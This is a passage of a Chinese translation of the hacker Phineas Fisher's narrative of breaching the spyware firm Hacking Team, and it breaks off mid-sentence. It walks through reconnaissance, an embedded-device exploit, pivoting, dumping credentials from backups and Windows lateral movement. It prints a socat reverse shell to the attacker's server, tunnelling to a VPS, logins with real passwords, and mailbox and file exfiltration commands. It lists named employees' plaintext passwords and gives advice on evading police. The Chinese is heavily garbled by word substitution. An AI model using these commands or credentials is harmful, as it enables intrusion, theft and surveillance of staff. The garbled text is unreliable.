NoSQL黑客讲述渗透Hacking Team全经过(详细分解)

NoSQL 1

近年来,黑客Phineas Fisher在pastebin.com上讲述了凌犯Hacking
Team的进度,以下为其讲述的原稿情状,文中附带有有关文档、工具及网站的链接,请在鹤岗环境下展开打开,并合理使用。小编部分思索相比激进,也请以辩证的见识看待之。

1、序言

在这边,恐怕您会注意到相比较于前方的一个版本,这些版本的情节及言语有了一部分变通,因为那将是最终一个版本了[1]。对于黑客技术,斯洛伐克(Slovak)语世界中已经有了好多图书,讲座,指南以及关于黑客攻击的知识。在尤其世界,有无数黑客比自个儿不错,但他俩埋没了他们的纯天然,而为所谓的“防护”服务商(如Hacking
Team之流的),情报机构服务工作。黑客文化当做一项非主流文化诞生于U.S.A.,但它现在只保留了它实质的魔力,其他均被同化了。从黑客的本色出发,至少他们得以穿着一件背心,把头发染成青色,用自身的黑客的名字,随意洒脱地做着祥和喜欢的事件,而当他们为外人(前文所指的Hacking
Team及情报机构)工作的时候,会感觉本人像个反抗者。

借使根据传统的法门,你只能够潜入办公室偷偷得到文件[2],大概您不得不持枪抢劫银行。但后天你只是要求一台台式机,躺在床上动入手指便可做得这一切[3][4]。像CNT在侵略伽玛公司(Gamma
Group)之后说的,“让大家以一种新的斗争格局向前迈进吧”[5]。

 

[1] http://pastebin.com/raw.php?i=cRYvK4jb

[2] https://en.wikipedia.org/wiki/Citizens%27\_Commission\_to\_Investigate\_the\_FBI

[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html

[4] https://securelist.com/files/2015/02/Carbanak\_APT\_eng.pdf 

[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group

 

2、Hacking Team

Hacking Team
是一家帮扶当局本着记者,激进分子,政坛中的反对派以及其余的对内阁大概造成的威胁因素开展入侵和监理的同盟社,详情可参看链接[1][2][3][4][5][6][7][8][9][10][11]。同样的,有时候也会指向违纪违纪和恐怖分子举办监督[12]。Vincenzetti为该家公司的老板,而其邮件的末梢签字往往带有法西斯口号“boia
chi
molla”(摒弃者死)。从来以来,他声称其独具化解“Tor难点”以及“暗网难题”的技术[13]。但对此,我保持自个儿的想法自由,我很狐疑其说的技术是还是不是确实可行。

 

[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/

[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama\_0\_4251324994.html

[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/

[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/

[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/

[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/

[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/

[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal

[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/

[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/

[11] http://www.theregister.co.uk/2015/07/13/hacking\_team\_vietnam\_apt/

[12] http://www.ilmessaggero.it/primopiano/cronaca/yara\_bossetti\_hacking\_team-1588888.html

[13] http://motherboard.vice.com/en\_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web

 

3、小心那里!

噩运的是,大家的世界凌乱不堪。有人可以由此做坏事来变得尤为方便,而有人却因做好事而境遇囚系。幸运的是,谢谢为了”Tor项目“付出努力的芸芸众生,你可以透过以下措施来掩藏自身,

(1)加密你的硬盘

自己认为别等到警察来拘禁你的电脑时,才悔之晚矣,俗话说,一分预防胜过格外治疗。

(2)使用虚拟机,并因而Tor来传输你的流量,那可以高达七个目标,第一,你的有着连接通过Tor可进展匿名。第二,保障你的私家生活和匿名生活(也可以视为,现实生活和互连网生活)分开在差别的微处理器上,那将帮衬您防止偶发会将五头混淆在一块儿。你还足以由此匿名操作系统Whonix,[3],
Tails [4], Qubes TorVM
[5]要么其余定制化的工具来维护本身[6]。你可以在相应的数码链接找到相比较详细的描述[7]。

(3)不要一向连接到Tor互连网(视意况而定)

Tor并不是万灵药。在您总是上Tor以及实施你的黑客行动时,那两者之间的时间点是唯恐会被提到的。当然,也存在使用Tor
出口节点 [8] 的口诛笔伐,恐怕您可以接纳别人的wifi连接到网络。而Wifislax
[9]
是一个兼有许多拿走wifi工具的发行版linux。其余一个挑选是,在一而再到Tor从前,先连接到VPN或是桥节点[10],但那只怕不安全,因为那足以使得黑客的行路与住所的互连网行为发出关联,(那也是杰里米Hammond杰里米·哈Mond 被控诉的由来(作为指控证据[11])。实际情况是,即便Tor是不完美的,但它仍是可以很好地支撑大家的做事。当我在青春鲁莽的时候,在除了拔取Tor,而从不其他任何保养措施的情事下,我做了重重事情(这里本身说的是黑客攻击),而警方却一贯不可以展开有效调查,直至今我并没有出现其余难题。

 

[1] https://www.torproject.org/

[2] https://info.securityinabox.org/es/chapter-4

[3] https://www.whonix.org/

[4] https://tails.boum.org/

[5] https://www.qubes-os.org/doc/privacy/torvm/

[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy

[7] https://www.whonix.org/wiki/Comparison\_with\_Others

[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/

[9] http://www.wifislax.com/

[10] https://www.torproject.org/docs/bridges.html.en

[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html

3.1、基础设备

一经要开展抨击,我不会直接从Tor出口节点实施攻击。因为这一个Tor出口节点都在黑名单上,速度很慢,并且不可以博取反向连接。Tor只是用来进展匿名,我会连接到用以实施攻击的底子设备,其中包涵,

(1)域名

可对C&C服务器进行导向,并为安全撤离设置好DNS隧道。

(2)稳定的服务器

作为C&C服务器收到反弹shells,同时作为一个动员攻击和储存得到种种数据的地点。

(3)攻击服务器

举行端口扫描,例如,扫描整个互连网,或者通过SQL注入下载一个数据库等。

3.2、责任

在消息上,大家平日见到攻击政坛的黑客团队(“一般经过执行APTs”),因为他俩连年利用同样的工具,留下同样的性状,甚至接纳同一的底蕴设备(域名,邮件等等)。因为他们得以动员任意攻击而不用负任何法律权利,所以往往不会专注那一点。

自己并不想让执法者太简单追溯到我对Hacking
Team做了什么。作为一名黑帽黑客燃膏继晷的干活,使用了新的服务器以及域名,注册了新的信箱,以及通过新的比特币进行交易。在侵犯的长河中只利用了那么些公然发表的工具,以及为了此次攻击专门编排的工具。而时至明天,我改变过去的劳作风格,为的就是不留下我的特色标志。

4、音信征集

固然它只怕是单调的,这一步是可怜主要的,因为攻击面越大,就越简单找到其中的毛病。

4.1、技术信息

所需的工具和技术:

(1) Google

从三遍精心布局的摸索查询中,你可以取得意想不到的事物。比如,DPR身份音信[1]。”谷歌Hacking for  Penetration Testers” [2]可作为参照,那是开展google
hacking的圣经。

(2)子域名列举

一个小卖部主要的域名平常为第三方单位所提供,你将会发现属于域名像mx.company.com,
ns1.company.com等等诸如此类的IP地址段。而有时那个子域名会“隐藏”起来,并不会揭示在网络之上。可利用工具像
fierce[3], theHarvester [4], and recon-ng [5]来枚举子域名.

(3)Whois查询与反向查询

透过使用域名whois查询消息大概集团的IP范围开展反向查询,你可以找到属于集团的其余域名和IP范围。据我所知,如今的话除了通过
google hack ,尚还不曾存在免费的反向whois查询,google hack如:

 

  “via della moscova 13”
site:www.findip-address.com

   “via della moscova 13”
site:domaintools.com

 

(4)端口扫描与指纹识别

除此之外其余技术,你还足以通过和该商厦的职工举行交谈,从中获取信息。我把它归属在那有些中是因为那种并不是一种攻击,仅仅只是一种征集新闻的措施。另一方面则是展初步口扫描,即使公司的IDS(侵袭防御连串)会进检测到端口扫描事件,不过不用顾虑,因为IDS本人的误报很多,都是源于其中间的告警音信,所以您的端口扫描会被淹没在大方的误报中。

对此扫描,使用nmap是最为符合的,可甄别它发现的绝一大半服务。因为企业包蕴了一大片IP地址段,考虑到功效,zmap[7]
和 masscan [8] 在功效上是较为火速的,WhatWeb [9] 以及BlindElephant
[10]则能经过指纹匹配网站。

 

[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html

[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando\_con\_google.pdf

[3] http://ha.ckers.org/fierce/

[4] https://github.com/laramies/theHarvester

[5] https://bitbucket.org/LaNMaSteR53/recon-ng

[6] https://nmap.org/

[7] https://zmap.io/

[8] https://github.com/robertdavidgraham/masscan

[9] http://www.morningstarsecurity.com/research/whatweb

[10] http://blindelephant.sourceforge.net/

 

4.2、社会新闻

对此社会工程,收集有关职工,岗位角色,通信方式,操作系统,插件,软件等消息是很是有效的。

(1)Google

反之亦然是最实用的工具。

(2)theHarvester及recon-ng工具

那八个工具已经在上有些涉嫌了,但骨子里那三个工具仍然有愈来愈多的机能。你可以由此它很快、自动地寻找到无数音信,它们的操作手册也都值得一读。

(3)LinkedIn

你可以在这里找到许多员工音信,公司的选聘人士是最能够与之进行“互换”的人。

(4) Data.com数据网站

如jigsaw,他们具有大量的员工音讯。

(5)文件元数据

您可以找到许多职工和相关系统音讯在合营社对外发表的文书中。针对公司网站上的文本举行检索以及提取其中的元数据,其中对比实惠的工具为metagoofil
[1] and FOCA [2]。

 

[1] https://github.com/laramies/metagoofil

[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html

 

5、进入内网

那里会有七种门道进入到内网。由于针对Hacking
Team所使用的方法不是很常用,而且会比平时的法子更麻烦。我指出先品尝接下去自身提到的广大格局。

5.1、社会工程

社会工程,越发是鱼叉式互联网钓鱼,近日也多数抨击事件都与那种办法有关。请参见西班牙(Spain)语的一个介绍,见[
1 ]。而对此以乌克兰(УКРАЇНА)语揭橥的越多的音讯,见[ 2
](第三有的,“有指向的口诛笔伐”)。有关社会工程在过去的妙趣横生的逸事,见[ 3
]。我不想尝尝针对Hacking
Team的钓鱼攻击,因为他们自我的一片段业务就是支援当局对其反对派进行钓鱼。所以这些中会有很大的高危害被Hacking
Team识别到,从而急功近利。

 

[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html

[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/

[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf

 

5.2、购买权限

谢谢勤劳的俄联邦人和她们的狐狸尾巴使用工具包,以及僵尸网络。大家也都明白,许多协作社的互联网中都会有局地破绽的机器。而大约拥有的财富榜上Top500的公司,都有一个宏大的互连网,且都会有一对僵尸机器在其中。相比较而言,Hacking
Team只是一家比较小的小卖部,而半数以上员工都是信息安全领域的大方,所以中间互连网现身纰漏的或然相比较小。

5.3、技术运用

在伽马集团被入侵之后,我在搜寻漏洞进程中发现一个历程。而据检测,Hacking
Team有以下的公网IP地址范围,

 

inetnum:        93.62.139.32

  • 93.62.139.47

descr:          HT public
subnet

 

但Hacking Team依然与公共互联网有一对继续。不像伽马企业,Hacking
Team面向公网的站点需求客户端的证实才足以通过。而基于自身最初的垂询,其中带有了一个重中之重站点(一个Joomla
blog,而就扫描工具Joomscan的扫描结果来看,并从未发觉什么样漏洞),一个邮件服务器,七个路由器,多少个VPN系统以及一个垃圾邮件过滤系统。所以,现在有多个选项:尝试找到一个Joomla的0day,恐怕是postfix邮件系统上的0day,要不就是嵌入式系统上的0day。所以,到了此间,挖掘一个在嵌入式系统上的0day相对来说应该相比不难了。在通过多个星期的逆向工作后,我发现了一个远道代码执行漏洞。由于该漏洞尚未修补,所以理论上接下来是足以拓展利用的。但在此间就不涉及到越多的细节。有关如何寻找该品种的纰漏的点子,可参见[3]以及[4]。

 

[1] http://pastebin.com/raw.php?i=cRYvK4jb

[2] http://sourceforge.net/projects/joomscan/

[3] http://www.devttys0.com/

[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A

 

6、准备工作

在针对Hacking
Team使用这些exp此前,我做了众多的准备跟测试。我编写了一个带有后门的固件,以及针对性嵌入式系统编制了多个post-exploitation工具。后门程序的功用在于敬重exploit。

以下为自我准备的post-exploitation工具:

(1)BusyBox

BusyBox 是一个合并了一百八个最常用linux命令和工具的软件。BusyBox
包涵了有的大约的工具,例如ls、cat和echo等等,还带有了一部分更大、更扑朔迷离的工具,例grep、find、mount以及telnet。它集成压缩了
Linux 的多多工具和指令,也富含了 Android 系统的自带的shell。

(2)nmap

环视及指纹识别Hacking Team的内部网络。

(3)Responder.py

内网中间人攻击脚本,攻击Windows最实惠的工具,无需用户账号,便可访问内部网络的权限。

(4)younghon

为了推行Responder.py

(5)tcpdump

嗅探流量

(6)dsniff

本着有尾巴协议(如FTP协议)举办密码嗅探,和ARP欺骗攻击。但自我更想利用ettercap(由Hacking
Team的ALoR和NaGA编写的),但很难编译进系统。

(7)socat

一个有效的pty shell:

my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
   hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
          tcp:my_server:my_port

该工具是属于互连网类瑞士联邦军刀,也可以说是一个netcat的同类型产品。socat的特色就是在多少个流之间确立一个双向的康庄大道。socat的地方类型很多,有ip,
tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl等等。

(8)screen

看似socat的pty脚本,其实也并不是需求工具,但那会让我在Hacking
Team的网络之中如身处家庭一样。那是一个SSH远程会话管理工具。

(9)一个SOCKS5代理服务器

与代理工具proxychains一起行使,用于访问内网。

(10)tgcd

用来进展端口转载,穿透防火墙。

 

[1] https://www.busybox.net/

[2] https://nmap.org/

[3] https://github.com/SpiderLabs/Responder

[4] https://github.com/bendmorris/static-python

[5] http://www.tcpdump.org/

[6] http://www.monkey.org/~dugsong/dsniff/

[7] http://www.dest-unreach.org/socat/

[8] https://www.gnu.org/software/screen/

[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html

[10] http://tgcd.sourceforge.net/

在开展攻击从前,需求先考虑下只怕会出现的意况。那么本身能预知的可能暴发的最坏事情是,我的后门或post-exploit工具将使系统不平静,从而挑起内部人士注意并拓展调研。因而,在其他易受攻击的同类集团网络环境中,我花了一周的岁月测试自身的纰漏,后门,和
post-exploit工具,然后才开始进入 Hacking Team 网络。

7、查看及监听

经过之前发现的尾巴及工具,现在本身早就身处于内网中了,我想随处查看下以及需求思想下一步做如何。切换Responder.py脚本到剖析情势(-A,仅监听,不发送过来数据包),及经过nmap举办低频,缓慢地围观。

8、NoSQL 数据库

数据库为NoSQL,只怕说是无需验证,那对于黑客来说是一个很棒的礼品。正当自家操心MySQL的保有漏洞或然被修复时[2][3][4][5]。以下新的数据库出现了,发现其安排存在表达漏洞。而透过Nmap,也发现了在Hacking
Team内网中的一些数据库。

 

27017/tcp open 
mongodb       MongoDB 2.6.5

| mongodb-databases:

|   ok = 1

|   totalSizeMb = 47547

|   totalSize = 49856643072

|_    version = 2.6.5

27017/tcp open 
mongodb       MongoDB 2.6.5

| mongodb-databases:

|   ok = 1

|   totalSizeMb = 31987

|   totalSize = 33540800512

|   databases

 

|_    version = 2.6.5

 

看起来那一个是Hacking
Team监控种类RCS所使用的测试实例。而由RCS监听的音频会以GridFS格局存储在MongoDB中。那就是在上面链接[6]中,音频文件夹的源点,看来他俩协调也监控着和谐。

 

[1] https://www.shodan.io/search?query=product%3Amongodb

[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html

[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie\_mysql.c

[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html

[6] https://ht.transparencytoolkit.org/audio/

 

9、跨越网段

个中相比好玩的是,其监督及抓取到的是Hacking
Team正在开发恶意程序的互联网摄影头画面,但是这一个信息对于下一步安排以来并不是很有用。而其中不安全的备份正是大家得以运用的漏洞。按照以下文档[1],他们的iSCSI系统应该是布局在一个隔断的互联网中,可是nmap能够扫描到其在192.168.1.200/24子网中的部分地点,

 

3260/tcp open  iscsi?

| iscsi-info:

|   Target: iqn.2000-01.com.synology:ht-synology.name

|     Address: 192.168.200.66:3260,0

|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local
(192.168.200.72)

3260/tcp open 
iscsi?

| iscsi-info:

|   Target: iqn.2000-01.com.synology:synology-backup.name

|     Address: 10.0.1.72:3260,0

|     Address: 192.168.200.72:3260,0

|_    Authentication: No authentication required

因iSCSI系统需求关联一个内核模块,所以要将其编译为嵌入式系统中存在必然难度。随后,我经过端口转换,将其挂载到一个VPS(虚拟专用服务器),

 

VPS: tgcd -L -p 3260 -q
42838

Sistema embebida: tgcd
-C -s
192.168.200.72:3260
-c VPS_IP:42838

VPS: iscsiadm -m
discovery -t sendtargets
-p 127.0.0.1

iSCSI ,现在发觉了
iqn.2000-01.com.synology的名字,但在将其挂载在此之前尚存在有的问题,因为它现在识别它的地方为192.168.200.72
以及 127.0.0.1。

为解决那几个题材,执行以下操作,

iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

随后执行,

scsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

最终我们中标将其挂载上了。

vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

紧接着发现多少个虚拟机的备份文件。Exchange邮件服务器让自个儿最感兴趣。但它容量太大了,下载不了,但我们如故能够中距离将其挂载,并寻找有趣的笔录。

$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1            2048  1258287103   629142528    7  HPFS/NTFS/exFAT

so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

于文件目录,

 

/mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311

 

俺们发现虚拟机的硬盘驱动器,将之挂载,

 

dfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd
/mnt/vhd-disk/

mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

 

最后我们现在早就接触到了基本的情节了,我们可以查阅旧的Exchange邮件服务器的拥有文件了。

 

[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf

 

10、从安全备份到域管理

在新余备份中自身最感兴趣的是,想尝试找到一个本人能够用来拜会实际服务器的密码或Hash。我用pwdump,cachedump,和lsadump
[ 1
]与注册表的备份来进展检索。而最后经过lsdadump发现了besadmin服务帐户(属于一加集团服务器)的密码:

 

_SC_BlackBerry MDS Connection
Service

0000   16 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00    …………….

0010   62 00 65 00 73 00 33 00 32 00
36 00 37 00 38 00    b.e.s.3.2.6.7.8.

0020   21 00 21 00 21 00 00 00 00 00
00 00 00 00 00 00    !.!.!………..

 

接下去自身在嵌入式系统中采用了proxychains代理工具以及smbclient去检测密码,

 

proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

获得到密码了!besadmin的密码依旧可用,且是个地点的admin账户。接下来,我用着自我的代办和metasploit’s
psexec_psh模块获取到一个meterpreter
session。接下转向一个64位的进度,”load kiwi
[5]和”creds_wdigest”,以下为博得到的片段密码音信,

 

HACKINGTEAM  BESAdmin       bes32678!!!

HACKINGTEAM  Administrator  uu8dd8ndd12!

HACKINGTEAM  c.pozzi        P4ssword      <—- look! the sysadmin!

HACKINGTEAM  m.romeo        ioLK/(90

HACKINGTEAM  l.guerra       4luc@=.=

HACKINGTEAM  d.martinez     W4tudul3sp

HACKINGTEAM  g.russo        GCBr0s0705!

HACKINGTEAM  a.scarafile    Cd4432996111

HACKINGTEAM  r.viscardi     Ht2015!

HACKINGTEAM  a.mino         A!e$$andra

HACKINGTEAM  m.bettini     
Ettore&Bella0314

HACKINGTEAM  m.luppi        Blackou7

HACKINGTEAM  s.gallucci     1S9i8m4o!

HACKINGTEAM  d.milan        set!dob66

HACKINGTEAM  w.furlan       Blu3.B3rry!

HACKINGTEAM  d.romualdi     Rd13136f@#

HACKINGTEAM  l.invernizzi  
L0r3nz0123!

HACKINGTEAM  e.ciceri       2O2571&2E

HACKINGTEAM  e.rabe         erab@4HT!

 

[1] https://github.com/Neohapsis/creddump7

[2] http://proxychains.sourceforge.net/

[3] https://www.samba.org/

[4] http://ns2.elhacker.net/timofonica/manuales/Manual\_de\_Metasploit\_Unleashed.pdf

[5] https://github.com/gentilkiwi/mimikatz

11、下载邮件

到现在自个儿曾经有了域管理员的权力,并且一度得以访问到合作社的中坚信息——邮件。因为我每使用一个密码都会大增被检测到的高风险,那自身就在对其举行浏览此前,先把邮件下载下来。而Powershell使得这一进度变得尤其简约。在取得到邮件之后,等了多少个星期才赢得到源代码以及任王大帅西。之后又进入两回去下载新的邮件。因为服务器是意国的,所以日期格式为日/月/年,我经过动用以下操作来进展:

 

-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

经过新的MailboxExportRequest,又下载了新的邮件(在那种气象下,所有的邮件皆是4月5日以前的。)难题在于一旦日期大于12(那是因为在弥利坚惯常将将月份放在第三位,而月份见惯不惊又不可以压倒12),那么会回去的日期将不可用。看来微软公司的工程师只根据他们协调所在的布署习惯测试了软件。

 

[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/

12、下载文件

明天自身拥有域管理员的权力,我经过代理和smbclient的-Tc选项,起头下载共享出来的文书,比如,

 

proxychains smbclient ‘//192.168.1.230/FAE DiskStation’ \

    -U ‘HACKINGTEAM/Administrator%uu8dd8ndd12!’ -Tc
FAE_DiskStation.tar ‘*’

13、Windows域管理简介

在此间我想中断下,来享受部分关于攻击Windows 网络的内容。

13.1新星的时刻

自己将快捷复述一下有关在Windows网络中的传播技术。远程执行技术需求须求一个当地的管理人密码仍然hash才能初叶展开。经常来说,获取那个登录口令的最广大的不二法门是使用
mimikatz
[1],以及上述所提到的sekurlsa::logonpasswords模块,sekurlsa::msv模块,在随后,应该就能以管理人权限访问机器了。而最重点的提权工具是PowerUp
[2]以及bypassuac [3]。

 

[1] https://adsecurity.org/?page\_id=1821

[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp

[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module\_source/privesc/Invoke-BypassUAC.ps1

 

长途指南:

(1)psexec

Windows互连网工具,你可以应用 psexec [1], winexe
[2]以及metasploit的psexec_psh模块,powershell empire的invoke_psexec
[4]或者是Windows命令”sc” [5]。对于metasploit模块,powershell
empire,pth-winexe
[6],获取hash便已丰硕,无需密码了。那是无比广泛的法门(要求开拓445端口),但那种做法也是最不审慎的。从自个儿的经历来看,那种方法在抨击进程中没有会被发觉,可是在今后恐怕调查人员会找到其中的一望可见,从而臆想出黑客的攻击路径。

(2)WMI

最谨慎的点子。WMI服务可以在颇具的微处理器上启用,除了服务器,因为防火墙会默许将其阻断。你可以利用wmiexec.py
[7],pth-wmis [6](同样,你可以找到wmiexec
以及pth-wmis的demo举行参考,请参考[8])。powershell
empires的invoke_wmi模块或许是Windows命令,wmic[5]。除了wmic之外,剩下的就须要要求hash了。

(3)PSRemoting [10]

这些职能默许是禁用的,我不建议在互联网环境中利用新的说道。可是倘假诺管理员启用了该意义,那么对于大家的话是更加便于的,更加是足以行使powershell来做几乎任何事情。纵然那种方式在powershell
5 和 Windows
10中保有改观,但powershell现在还是能很容易的做过多事情,比如规以免病毒检测以及预防留下越来越多的指印。

(4)程序职分

您可以由此 at 和
schtasks[5]长距离执行这些程序。它们工作机制与psexec相同,同时也会留给一些已知的螺纹。

(5)GPO

要是拥有的情商都被剥夺恐怕被防火墙阻断,可是一旦您是域管理员,你可以利用GPO给它一个登录脚本,接着安装msi,并举办一个程序义务[13],恐怕似乎大家看来Mauro
Romeo(Hacking
Team的系统管理员)的电脑上操作一样,通过GPO来启用WMI以及关闭防火墙过滤。

 

[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx

[2] https://sourceforge.net/projects/winexe/

[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec\_psh

[4] http://www.powershellempire.com/?page\_id=523

[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-

cc/

[6] https://github.com/byt3bl33d3r/pth-toolkit

[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py

[8] https://www.trustedsec.com/june-2015/no\_psexec\_needed/

[9] http://www.powershellempire.com/?page\_id=124

[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/

[11] https://adsecurity.org/?p=2277

[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems

[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral\_movement/new\_gpo\_immediate\_task.py

 

地面指南:

(1)伪造token

只要您能以管理人权限访问到一台计算机,你也得以应用其余用户的token去访问域管理上的资源。可落成该效能的多个推荐工具是
incognito [1]以及mimikatz[2]中的“token::*”命令。

(2)MS14-068

您可以行使一个在Kerberos钻探上可用的尾巴,生成一个域大班凭证。

(3)通过hash

假如您所有一个用户,但该用户并无一个可用的对话,你可以选拔sekurlsa:pth
[2]去获得一个用户凭证。

(4)进度注入

其余的RAT可以被注入到其它一个经过中-在meterpreter 和 pupy中的 [6]
migrate命令,比如,或者powershell empire中的psinject
[7]。你可以经过上述工具只怕命令注入到有你要求的token的进度中。

(5)runas

runas是同意用户用任何权限运行指定的工具和程序,而不是用户眼下报到提供的权杖,有时候会比较有用,该命令属于Windows的一局地,在选拔进度中只要您从未对号入座的图形界面,你也足以使用powershell[8]。

 

[1] https://www.indetectables.net/viewtopic.php?p=211165

[2] https://adsecurity.org/?page\_id=1821

[3] https://github.com/bidord/pykek

[4] https://adsecurity.org/?p=676

[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html

[6] https://github.com/n1nj4sec/pupy

[7] http://www.powershellempire.com/?page\_id=273

[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1

 

13.2、维持权限

要是您获取了访问权限,接下去是想保持它。而不息开展对于我们来说是一个挑衅。当您渗透集团时,一般是不须要保持权限的,因为商家一般不会关闭机器。对于权力维持的越来越多音信,可以参照
[2][3][4]。可是渗透集团时,你根本不必要它,那只会扩充被检测到的危机。

 

[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/

[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/

[3] http://www.hexacorn.com/blog/category/autostart-persistence/

[4] https://blog.netspi.com/tag/persistence/

 

13.3、内部侦查

这个天使用探测Windows互联网的最好工具是Powerview
[1].该工具的使用值得一读[2],[3], [4], [5], [6]。

Powershell在此间同样也是一个精锐的工具。可是因为依然有诸多服务器版本为2003及2000版的(那些本子并没有powershell作用),所以依旧须求看回古板的途径方式,如运用netview.exe
[9]工具或许windows的”new view”命令。其余的技术本身是指出如下:

(1)下载文件列表

在域管理账户的权力下,你可以经过powerview下载网络中有着的文本列表,

 Inqvoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |

   select-string
‘^(.*) \t-‘ | %{dir -recurse
$_.Matches[0].Groups[1]

   | select fullname | out-file -append
files.txt}

(2)阅读邮件

如上所说的,现在大家可以透过powershell来下载邮件,从而得到有效的音讯。

(3)读取sharepoint平台音信

无异于的,sharepoint平台亦是一个商店关键的军事管制连串,你也是足以行使powershell
[10]下载相关信息。

(4)活动目录[11]

个中设有大气立见成效的音讯,像用户和处理器等音信。无需获取域管理员账号,你也是足以经过powerview以及其余工具[12]来博取。在成为域管理员之后,你可以透过利用csvde或任何工具,从AD域中导出音信。

(5)监控员工

经过监视Christian Pozzi(Hacking
Team的系统管理员),我收获到走访Nagios互连网监视服务器的权限,而它带给自身访问到’rete
sviluppo(互联网发展)’区域的权力(存放RCS源码的支付互连网区域)。通过一记简单的组合拳(利用PowerSploit的Get-Keystrokes
和 Get-TimedScreenshot
[13]作用模块),nishang(基于powershell的渗透测试框架)的Do-Exfiltration以及GPO,我得以监视互连网中随意一个职工,甚至是总体域。

 

[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView

[2] http://www.harmj0y.net/blog/tag/powerview/

[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/

[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/

[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/

[6] http://www.slideshare.net/harmj0y/i-have-the-powerview

[7] https://adsecurity.org/?p=2535

[8] https://www.youtube.com/watch?v=rpwrKhgMd7E

[9] https://github.com/mubix/netview

[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/

[11] https://adsecurity.org/?page\_id=41

[12] http://www.darkoperator.com/?tag=Active+Directory

[13] https://github.com/PowerShellMafia/PowerSploit

[14] https://github.com/samratashok/nishang

 

14、狩猎系统管理员

通过查阅内部IT基础设备的连锁文档[1],我了然如今仍然没有权限去拜访其中的根本区域’Rete
Sviluppo’,这么些区域是存放RCS源代码的地点,且是单身的网络。一个集团的系统管理员平日来说,都会有权力访问具有的设备、网络及系统等。我经过询问搜索Mauro
Romeo 和 Christian Pozzi的微机,查看他们是什么样访问到’rete
